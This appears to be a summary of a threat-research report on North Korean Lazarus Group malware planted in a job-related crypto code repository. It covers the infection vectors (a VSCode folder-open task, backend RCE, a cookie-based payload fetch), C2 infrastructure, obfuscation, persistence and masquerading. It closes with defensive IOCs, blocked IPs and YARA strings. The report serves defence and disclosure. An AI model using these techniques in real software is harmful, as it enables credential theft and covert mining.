Hunting Lazarus - Inside the Contagious Interview C2 Infrastructure

In early January 2026, during routine vetting of a cryptocurrency project sourced via Upwork, Red Asgard’s threat research team discovered North Korean malware. The contractor—using a fake identity—had embedded malware in a legitimate-looking code repository. What followed was a five-day investigation into active Lazarus Group infrastructure. The repository contained three distinct infection mechanisms: VSCode Auto-Execution via a .vscode/tasks.json file configured with runOn: folderOpen, Backend RCE via a Function.constructor in an errorHandler.js file, and Cookie Payload Delivery (Vynlence variant) through a getCookie() function fetching malicious JavaScript from a C2.

All three vectors pointed to Vercel-hosted Stage 1 C2 servers. The infrastructure mapped included Stage 2 Dedicated C2 Servers, such as 147.124.213.232 and 147.124.212.125, all running Windows Server 2019/2022 with Express.js on port 1244, pyftpdlib FTP on port 21, and RDP/WinRM for operator access. The C2 serves modular payloads via token-authenticated endpoints, including Chrome stealer, Extended stealer, Network module, MetaMask injector, and the Tsunami backdoor. The bro_*.js payload contains 64 nested obfuscation layers, with Layer 1 being Base85 + XOR (key: Vw1aGYoP) and subsequent layers involving zlib + reversed base64. The final payload revealed a full-featured backdoor with XMRig cryptocurrency miner, disguised as msedge.exe. The operators aren’t just stealing credentials—they’re also mining Monero on victim machines.

After deobfuscation, the 175KB Python payload reveals sophisticated persistence and monetization. Persistence Mechanisms include a “Windows Update Script.pyw” in the Startup Folder and a “Runtime Broker” scheduled task at logon, with Defender Exclusions added via PowerShell. Masquerading involves “Runtime Broker.exe” for the installer and client, and “msedge.exe” for the XMRig miner. Additionally, the Z238 (66.235.168.238) custom ports (22411-22412) run a custom binary protocol, which was cracked after observing a repeating 0xcb XOR pattern. During active reconnaissance, operators responded to probing: 3 of 5 C2 services went offline mid-investigation, Z238 custom ports closed after initial probes, and rate limiting was triggered after auth packet testing.

We assess with high confidence this is Lazarus Group infrastructure. Evidence includes IP 147.124.212.125 being flagged by 14 VT vendors, the same /24 subnet documented in Sekoia and Unit42 reports, and TTP match: fake jobs -> GitHub -> VSCode -> crypto theft. Defensive recommendations include blocking C2 IPs: 147.124.213.232, 147.124.212.125, 216.250.251.87, 45.43.11.199, 66.235.63.55, 66.235.168.238, 45.59.163.55. Network-level monitoring should alert on port 1244/tcp and 1249/tcp connections, and hunt FTP connections to /DAhkMrMq7/ path. Host-level alerts should be set for “Windows Update Script.pyw” in the Startup folder, “Runtime Broker.exe” in non-standard locations, and “msedge.exe” in %LOCALAPPDATA%/Microsoft/Windows/Applications. YARA strings for detection include “!!!HappyPenguin1950!!!”, “TSUNAMI_INJECTOR”, “Windows Update Script.pyw”, and “G01d*8@(.”.

To read the complete article see: Hunting Lazarus .